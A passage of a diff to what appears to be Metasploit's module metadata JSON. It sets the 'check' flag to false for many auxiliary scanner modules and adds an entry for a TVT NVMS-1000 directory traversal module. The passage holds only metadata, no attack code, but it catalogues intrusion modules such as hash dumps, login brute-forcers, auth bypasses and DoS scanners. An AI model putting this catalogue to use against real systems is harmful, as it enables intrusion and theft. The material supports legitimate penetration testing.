-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30267,7 +30365,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_logfile",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30313,7 +30411,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_web_gateway_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30364,7 +30462,7 @@
    "path": "/modules/auxiliary/scanner/http/thinvnc_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/thinvnc_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30410,7 +30508,7 @@
    "path": "/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/titan_ftp_admin_pwd",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30456,7 +30554,7 @@
    "path": "/modules/auxiliary/scanner/http/title.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/title",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30505,7 +30603,7 @@
    "path": "/modules/auxiliary/scanner/http/tomcat_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30574,7 +30672,7 @@
    "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_mgr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30674,7 +30772,7 @@
    "path": "/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tplink_traversal_noauth",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30722,7 +30820,7 @@
    "path": "/modules/auxiliary/scanner/http/trace.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/trace",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30768,7 +30866,55 @@
    "path": "/modules/auxiliary/scanner/http/trace_axd.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/trace_axd",
-    "check": true,
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/http/tvt_nvms_traversal": {
+    "name": "TVT NVMS-1000 Directory Traversal",
+    "fullname": "auxiliary/scanner/http/tvt_nvms_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-12",
+    "type": "auxiliary",
+    "author": [
+      "Numan Türle",
+      "Dhiraj Mishra"
+    ],
+    "description": "This module exploits an unauthenticated directory traversal vulnerability which\n        exists in TVT network surveillance management software-1000 version 3.4.1.\n        NVMS listens by default on port 80.",
+    "references": [
+      "CVE-2019-20085",
+      "EDB-47774"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-21 08:43:19 +0000",
+    "path": "/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/tvt_nvms_traversal",
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30814,7 +30960,7 @@
    "path": "/modules/auxiliary/scanner/http/typo3_bruteforce.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/typo3_bruteforce",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30860,7 +31006,7 @@
    "path": "/modules/auxiliary/scanner/http/vcms_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/vcms_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30906,7 +31052,7 @@
    "path": "/modules/auxiliary/scanner/http/verb_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/verb_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30952,7 +31098,7 @@
    "path": "/modules/auxiliary/scanner/http/vhost_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/vhost_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30999,7 +31145,7 @@
    "path": "/modules/auxiliary/scanner/http/wangkongbao_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wangkongbao_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31045,7 +31191,7 @@
    "path": "/modules/auxiliary/scanner/http/web_vulndb.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/web_vulndb",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31091,7 +31237,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31137,7 +31283,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31183,7 +31329,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_website_content.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_website_content",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31231,7 +31377,7 @@
    "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webpagetest_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31280,7 +31426,7 @@
    "path": "/modules/auxiliary/scanner/http/wildfly_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wildfly_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31381,7 +31527,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_cp_calendar_sqli",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31435,7 +31581,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_ghost_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31485,7 +31631,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_login_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_login_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31534,7 +31680,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_multicall_creds",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31585,7 +31731,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_pingback_access.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_pingback_access",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31631,7 +31777,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31679,7 +31825,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_xmlrpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31779,7 +31925,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_contus_video_gallery_sqli",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31829,7 +31975,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_dukapress_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31877,7 +32023,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_gimedia_library_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31926,7 +32072,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_mobile_pack_info_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31974,7 +32120,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_mobileedition_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32022,7 +32168,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_nextgen_galley_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32070,7 +32216,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_simple_backup_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32119,7 +32265,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_subscribe_comments_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32165,7 +32311,7 @@
    "path": "/modules/auxiliary/scanner/http/xpath.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/xpath",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32213,7 +32359,7 @@
    "path": "/modules/auxiliary/scanner/http/yaws_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/yaws_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32259,7 +32405,7 @@
    "path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zabbix_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32306,7 +32452,7 @@
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32353,7 +32499,7 @@
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32394,7 +32540,7 @@
    "path": "/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb",
    "is_install_path": true,
    "ref_name": "scanner/ike/cisco_ike_benigncertain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32431,7 +32577,7 @@
    "path": "/modules/auxiliary/scanner/imap/imap_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/imap/imap_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32468,7 +32614,7 @@
    "path": "/modules/auxiliary/scanner/ip/ipidseq.rb",
    "is_install_path": true,
    "ref_name": "scanner/ip/ipidseq",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32510,7 +32656,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_cipher_zero",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32552,7 +32698,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_dumphashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -32590,7 +32736,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32665,7 +32811,7 @@
    "path": "/modules/auxiliary/scanner/kademlia/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/kademlia/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32702,7 +32848,7 @@
    "path": "/modules/auxiliary/scanner/llmnr/query.rb",
    "is_install_path": true,
    "ref_name": "scanner/llmnr/query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32748,7 +32894,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_hashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32794,7 +32940,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32840,7 +32986,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32877,7 +33023,7 @@
    "path": "/modules/auxiliary/scanner/mdns/query.rb",
    "is_install_path": true,
    "ref_name": "scanner/mdns/query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32917,7 +33063,7 @@
    "path": "/modules/auxiliary/scanner/memcached/memcached_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/memcached/memcached_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32954,7 +33100,7 @@
    "path": "/modules/auxiliary/scanner/memcached/memcached_udp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/memcached/memcached_udp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32991,7 +33137,7 @@
    "path": "/modules/auxiliary/scanner/misc/cctv_dvr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/cctv_dvr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33033,7 +33179,7 @@
    "path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/cisco_smart_install",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33073,7 +33219,7 @@
    "path": "/modules/auxiliary/scanner/misc/clamav_control.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/clamav_control",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33114,7 +33260,7 @@
    "path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/dahua_dvr_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33162,7 +33308,7 @@
    "path": "/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/dvr_config_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33200,7 +33346,7 @@
    "path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/easycafe_server_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33238,7 +33384,7 @@
    "path": "/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ib_service_mgr_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33275,7 +33421,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_channel_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33312,7 +33458,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33349,7 +33495,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33388,7 +33534,7 @@
    "path": "/modules/auxiliary/scanner/misc/java_jmx_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/java_jmx_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33428,7 +33574,7 @@
    "path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/java_rmi_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33465,7 +33611,7 @@
    "path": "/modules/auxiliary/scanner/misc/oki_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/oki_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33502,7 +33648,7 @@
    "path": "/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/poisonivy_control_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33540,7 +33686,7 @@
    "path": "/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/raysharp_dvr_passwords",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33577,7 +33723,7 @@
    "path": "/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/rosewill_rxs3211_passwords",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33617,7 +33763,7 @@
    "path": "/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/sercomm_backdoor_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33650,11 +33796,11 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/sunrpc_portmapper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33694,7 +33840,7 @@
    "path": "/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/zenworks_preboot_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33732,7 +33878,7 @@
    "path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mongodb/mongodb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33769,7 +33915,7 @@
    "path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/motorola/timbuktu_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33807,7 +33953,7 @@
    "path": "/modules/auxiliary/scanner/mqtt/connect.rb",
    "is_install_path": true,
    "ref_name": "scanner/mqtt/connect",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33844,7 +33990,7 @@
    "path": "/modules/auxiliary/scanner/msf/msf_rpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/msf/msf_rpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -33891,7 +34037,7 @@
    "path": "/modules/auxiliary/scanner/msf/msf_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/msf/msf_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33934,7 +34080,7 @@
    "path": "/modules/auxiliary/scanner/msmail/exchange_enum.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/exchange_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33977,7 +34123,7 @@
    "path": "/modules/auxiliary/scanner/msmail/host_id.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/host_id",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34020,7 +34166,7 @@
    "path": "/modules/auxiliary/scanner/msmail/onprem_enum.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/onprem_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34065,7 +34211,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34110,7 +34256,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34155,7 +34301,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_ping",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34200,7 +34346,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34240,7 +34386,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34278,7 +34424,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_file_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34315,7 +34461,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34352,7 +34498,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34389,7 +34535,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34426,7 +34572,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34463,7 +34609,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_writable_dirs",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34500,7 +34646,7 @@
    "path": "/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/natpmp/natpmp_portscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34537,7 +34683,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_ntp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34583,7 +34729,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_rest_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34629,7 +34775,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_xmlrpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34675,7 +34821,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_xmlrpc_ping",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34712,7 +34858,7 @@
    "path": "/modules/auxiliary/scanner/netbios/nbname.rb",
    "is_install_path": true,
    "ref_name": "scanner/netbios/nbname",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34758,7 +34904,7 @@
    "path": "/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nexpose/nexpose_api_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34796,7 +34942,7 @@
    "path": "/modules/auxiliary/scanner/nfs/nfsmount.rb",
    "is_install_path": true,
    "ref_name": "scanner/nfs/nfsmount",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34836,7 +34982,7 @@
    "path": "/modules/auxiliary/scanner/nntp/nntp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nntp/nntp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34876,7 +35022,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_monlist.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_monlist",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34917,7 +35063,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_nak_to_the_future",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34956,7 +35102,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_peer_list_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34995,7 +35141,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_peer_list_sum_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35034,7 +35180,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_readvar.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_readvar",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
